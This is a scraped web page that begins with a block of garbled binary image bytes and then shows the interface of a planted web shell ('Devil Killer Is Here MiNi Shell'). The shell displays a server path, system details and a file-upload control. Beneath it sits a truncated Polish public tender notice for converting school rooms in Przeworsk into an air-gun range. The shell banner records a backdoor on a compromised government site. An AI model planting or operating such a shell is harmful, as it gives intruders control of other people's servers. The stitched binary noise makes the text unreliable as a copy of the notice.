JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250820/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250820/0038270001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zmiana sposobu użytkowania 2 pomieszczeń w Zespole Szkół Zawodowych im. Jana III Sobieskiego na strzelnicę pneumatyczną z pomieszczeniem magazynowym”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Przeworski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900252</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jagiellońska 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przeworsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">starosta@powiat.przeworsk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.powiatprzeworsk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zmiana sposobu użytkowania 2 pomieszczeń w Zespole Szkół Zawodowych im. Jana III Sobieskiego na strzelnicę pneumatyczną z pomieszczeniem magazynowym”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ab3abd0d-8894-42dc-ac15-a33917b91ade</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00382700</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00042040/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Zmiana sposobu użytkowania 2 pomieszczeń w Zespole Szkół Zawodowych im. Jana III Sobieskiego na strzelnicę pneumatyczną z pomieszczeniem magazynowym</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiatprzeworsk.logintrade.net/zapytania_email,207459,00123021d5a76b9694416b5e304e22b3.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W niniejszym postępowaniu komunikacja między Zamawiającym a Wykonawcami<br/>odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej Logintrade (pzp24.pl) na<br/>dedykowanej stronie Zamawiającego powiatprzeworsk.logintrade.net. pod bezpośrednim linkiem do postępowania:<br/>https://powiatprzeworsk.logintrade.net/zapytania_email,207459,00123021d5a76b9694416b5e304e22b3.html <br/>2. W uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy,<br/>Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres mail: zamowienia@powiatprzeworsk.pl (nie dotyczy<br/>składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z art. 67 ustawy Pzp<br/>Zamawiający podaje wymagania techniczne, jakim musi odpowiadać sprzęt komputerowy Wykonawcy, aby móc korzystać z<br/>Platformy:<br/>1) Dopuszczalne przeglądarki internetowe:<br/>a) Edge<br/>b) Google Chrome,<br/>c) Mozilla Firefox,<br/>d) Opera,<br/>2) Pozostałe wymagania techniczne:<br/>a) dostęp do sieci Internet<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax<br/>c) włączona obsługa JavaScript<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>e) zainstalowany Acrobat Reader<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/>W postępowaniu o udzielenie zamówienia korespondencja elektroniczna pomiędzy Zamawiającym a Wykonawcami w<br/>szczególności składanie dokumentów elektronicznych (innych niż oferta oraz załączniki do oferty), cyfrowych odwzorowań<br/>dokumentów oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem zakładki ,,Korespondencja” dostępnej na<br/>Platformie Przetargowej z przedmiotowym postępowaniem. Zamawiający do komunikacji z Wykonawcami będzie komunikował się<br/>za pomocą zakładki ,,Wezwanie/Zawiadomienie”. Zamawiający wysyła dokumenty z wezwaniem/zawiadomieniem poprzez<br/>platformę, a ta przesyła wiadomość mailową na adres mailowy powiązany z kontem wykonawcy na platformie.<br/>Wezwania/Zawiadomienia nie odkładają się na platformie, są tylko na mailu wykonawcy.<br/>- Dokumenty elektroniczne (inne niż oferta oraz załączniki do oferty) oraz cyfrowe odwzorowania dokumentów składane są przez<br/>Wykonawcę za pośrednictwem zakładki „Korespondencja”.<br/>- Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego<br/>podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego<br/>- Oferta oraz inne dokumenty składane wraz z ofertę muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub<br/>podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art.13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady(UE)2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z 04.05.2016,str.1), dalej „RODO”, informuję, że:<br/>•	administratorem danych osobowych Wykonawcy jest Starosta Przeworski.<br/>•	we wszystkich sprawach związanych z przetwarzaniem udostępnionych danych osobowych Wykonawca może się kontaktować z Inspektorem Ochrony Danych, kontakt pisemny za pomocą poczty tradycyjnej na adres ul. Jagiellońska 10, 37 – 200 Przeworsk lub pocztą elektroniczną na adres e-mail: iod@powiatprzeworsk.pl.<br/>•	firmą podprzetwarzącą dane jest Platforma Zakupowa Logintrade, którego operatorem jest LT Serwis sp. z o.o. z siedzibą w Warszawie, 00-644 Warszawa, ul. Polna 48/11.<br/>•	dane osobowe Wykonawcy przetwarzane będą w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego na podstawie art. 6 ust. 1 lit.c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na Zamawiającym;<br/>•	odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.18 oraz art.74 ustawy Pzp;<br/>•	dane osobowe Wykonawcy będą przechowywane, zgodnie z art.78 ust.1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. W przypadku gdy zamówienie publiczne będzie współfinansowane, dane osobowe będą przechowywane przez okres wynikający z właściwych przepisów powszechnie obowiązującego prawa z uwzględnieniem przepisów dotyczących archiwizacji dokumentów;<br/>•	obowiązek podania przez wykonawcę danych osobowych bezpośrednio dotyczących wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje nie podania określonych danych wynikają z ustawy Pzp;<br/>•	w odniesieniu do danych osobowych wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO i nie będą profilowane, <br/>•	wykonawca na podstawie art.15 RODO posiada prawo dostępu do swoich danych osobowych;<br/>•	wykonawca posiada prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;<br/>•	wykonawcy nie przysługuje:<br/>-	w związku z art.17 ust.3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>-	prawo do przenoszenia danych osobowych, o którym mowa w art.20 RODO;<br/>-	na podstawie art.21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art.6 ust.1 lit. c RODO.<br/>2.	Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art.14 ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja o ograniczeniach stosowania przepisów rozporządzenia 2016/679 RODO:<br/>•	na podstawie art. 16 RODO wykonawca posiada prawo do sprostowania lub uzupełnienia swoich danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>•	na podstawie art. 18 RODO wykonawca posiada prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art.18 ust.2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZ.272.17.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest adaptacja 2 pomieszczeń w budynku Zespołu Szkół Zawodowych im. Jana III Sobieskiego w Przeworsku na potrzeby utworzenia strzelnicy pneumatycznej typu zamkniętego z pomieszczeniem magazynowym oraz zakupu wyposażenia strzelnicy pneumatycznej umożliwiającego realizację szkolenia strzeleckiego na poziomie podstawowym. <br/>2.	Budynek Zespołu Szkół Zawodowych im. Jana III Sobieskiego znajduję się przy ul. Krasickiego 9, 37-200 Przeworsk działki nr ewid.: 430;4500, jednostka ewidencyjna: 181401_1 obręb: 0001.<br/>3.	Pomieszczenia podlegające zmianie sposobu użytkowania pełnią obecnie funkcje archiwum i pomieszczenia magazynowego. <br/>4.	W istniejąca infrastrukturze zaprojektowano wykonanie 5-cio stanowiskowej strzelnicy pneumatycznej o długości strefy strzelań wynoszącej 10,0 m.<br/>5.	Planowany zakres prac przy realizacji zamówienia obejmuje wykonanie wszelkich robót zgodnie z obowiązującymi przepisami, w tym prac polegających na robotach rozbiórkowych i demontażowych, robotach remontowo – budowalnych, wykonaniu instalacji elektrycznych oraz wyposażenie strzelnicy obejmujących:<br/>	demontaż istniejących opraw oświetleniowych<br/>	demontaż drzwi wewnętrznych<br/>	wykonanie osłon ścian wewnętrznych zabezpieczających przed rykoszetami z wystrzelonego pocisku z płyt g-k na stelażu stalowym<br/>	wykonanie zabezpieczenia na ścianie tylnej stanowiącej kulochwyt z płyt gipsowo kartonowych (na stelażu stalowym systemowym) pokrytych dodatkowo płytami styropianu twardego gr.5,0cm oraz wełny skalnej mineralnej twardej zabezpieczonej welonem szklanym o gr.10,0 cm<br/>	wykonanie maskownic okien od wysokości parapetu do nadproża roletami markizowymi typu Skreen Roll wykonanych z materiału zaciemniającego (tkanina podgumowana) ze sterowaniem elektrycznym,<br/>	montaż oświetlenia strzelnicy oraz przesłony oświetlenia z blachy stalowej powlekanej<br/>	wykonanie i zamontowanie osłon na grzejnik c.o.<br/>	wykonanie nowej instalacji gniazd zasilania stanowisk z urządzeniami pneumatycznymi oświetlenia (lampy LED) strzelnicy<br/>	montaż drzwi wewnętrznych<br/>	malowanie ścian, sufitu<br/>	montaż wentylatorów dachowych<br/><br/>Wyposażenie strzelnicy obejmuje dostarczenie: <br/>	Karabinek pneumatyczny generujący początkową energię kinetyczna śrutu poniżej 17J <br/>	Pistolety pneumatyczne generujący początkową energię kinetyczna śrutu poniżej 17J <br/>	Kulochwyt<br/>	Urządzenie do transportu tarcz strzelniczych /tarczociagi/posiadające możliwość ustawienia /zaprogramowania/ zmiennych odległości zatrzymania tarcz do strzelającego <br/>	Urządzenie do podświetlania tarcz strzelniczych <br/>	Automatyczny podajnik do tarcz <br/>	Stół /podest strzelniczy/ usytuowany prostopadle do wszystkich stanowisk strzeleckich stanowiących jednocześnie linie otwarcia ognia oraz linie stanowisk strzeleckich dla wszystkich strzelających <br/>	Przesłona miedzy stanowiskami z płyty poliwęglanowej litej <br/>	Stolik dla instruktora <br/>	Krzesło dla instruktora<br/>	krzesło na stanowisko strzeleckie <br/>	apteczka medyczna z wyposażeniem pierwszej pomocy <br/>	tablica informacyjna <br/>	regulamin strzelnicy pneumatycznej <br/>	okulary ochronne <br/>	okulary ochronne dla instruktora <br/>	śrut o średnicy nie większej niż 6,35mm <br/>	tarcze strzelnicze <br/>	szafa do przechowywania broni i akcesoriów strzeleckich<br/>	butla gazowa<br/>	statyw trójnóg podpórka do karabinku <br/>	pojemnik do przechowywania zużytego śrutu z opisem złom ołowiany <br/>	pojemnik na zużyte tarcze strzelnicze z opisem zużyte tarcze strzelnicze<br/>	siatka maskująca<br/>	zatwierdzone i wyeksponowane na tablicy w widocznym miejscu warunki bezpieczeństwa podczas przebywania na strzelnicy pneumatycznej <br/><br/>6.	Szczegółowy zakres zamówienia stanowiący opis przedmiotu zamówienia (OPZ) określony został za pomocą załącznika nr 4 do SWZ zawierającego:<br/>1)	dokumentacje projektową,<br/>2)	specyfikacji technicznych wykonania i odbioru robót budowlanych (dla poszczególnych branży),<br/>3)	specyfikacja wyposażenia strzelnicy<br/>4)	przedmiarów robót (UWAGA: Rozliczenie ryczałtowe inwestycji. Zakres prac do wykonania w ramach niniejszego zamówienia określają załączone dokumenty projektowe. Przedmiar robót ma charakter orientacyjny – stanowią jedynie dokumenty pomocnicze w celu ustalenia ceny ofertowej. Wykonawca sam dokona oceny ostatecznego zakresu w oparciu o dokumentacje projektowe i zalecaną wizję w terenie), stanowiących integralną część niniejszej Specyfikacji Warunków Zamówienia.<br/>Wymienione dokumenty są zamieszczone na stronie internetowej Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45421152-4 - Instalowanie ścianek działowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert z przypisaniem im odpowiednio wag:<br/>1)	Cena - waga 60 % (60 pkt) <br/>2)	Okres gwarancji – waga 40% (40 pkt) <br/><br/>Ad.1) dla kryterium ,,Cena” – waga 60 %<br/>Kryterium ,,Cena” będzie rozpatrywane na podstawie łącznej ceny brutto, podanej przez Wykonawcę w Formularzu Oferty. Liczba punktów w będzie obliczona na podstawie poniższego wzoru:<br/><br/> cena brutto oferty najtańszej <br/> niepodlegającej odrzuceniu <br/> Ilość punktów = ------------------------------------------------- x 60 pkt <br/> cena brutto badanej oferty<br/> <br/>W tym kryterium można uzyskać maksymalnie 60 punktów. <br/><br/>Ad.2) dla kryterium „Okres gwarancji ” – waga 40 %<br/>Kryterium „Okres gwarancji ”, zostanie ocenione na podstawie wskazanego przez Wykonawcę w ofercie okresu gwarancji. Gwarancja obejmuje wszystkie elementy dostarczonego wyposażania oraz wszystkie wykonane prace w ramach realizacji przedmiotu zamówienia.<br/>Wymagany minimalny okres gwarancji wynosi 24 miesiące.<br/>Maksymalny punktowany okres gwarancji wynosi 60 miesięcy.<br/>Ocena w ramach tego kryterium zostanie dokonana zgodnie z poniższą punktacją:<br/>1)	za zaoferowanie terminu 24 miesięcy gwarancji - 0 pkt;<br/>2)	za zaoferowanie terminu 36 miesięcy gwarancji - 10 pkt;<br/>3)	za zaoferowanie terminu 48 miesięcy gwarancji - 20 pkt;<br/>4)	za zaoferowanie terminu 60 miesięcy gwarancji - 40 pkt;<br/><br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 40 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia i dokumenty składane razem z ofertą:<br/>1)	Formularz ofertowy - stanowiący załącznik nr 1 do SWZ <br/>2)	Dokumenty potwierdzające umocowanie do działania w imieniu wykonawcy. <br/>W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający wymaga złożenia odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu pierwszym jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów przy czym poprzez w/w dane należy rozumieć wskazanie przez Wykonawcę w ofercie lub w innych dokumentach załączonych do 